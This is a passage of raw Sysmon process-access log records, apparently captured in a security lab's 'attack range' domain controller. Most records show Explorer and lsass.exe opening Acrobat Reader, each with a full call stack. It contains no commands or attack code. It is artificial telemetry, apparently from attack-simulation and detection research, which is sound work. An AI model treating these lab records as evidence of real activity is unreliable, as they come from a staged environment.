DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39b19|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39b19|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39b19|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046672Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39b19|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046671Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046670Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.336{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11 10341000x800000000000000046662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39a11|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.335{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.334{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader 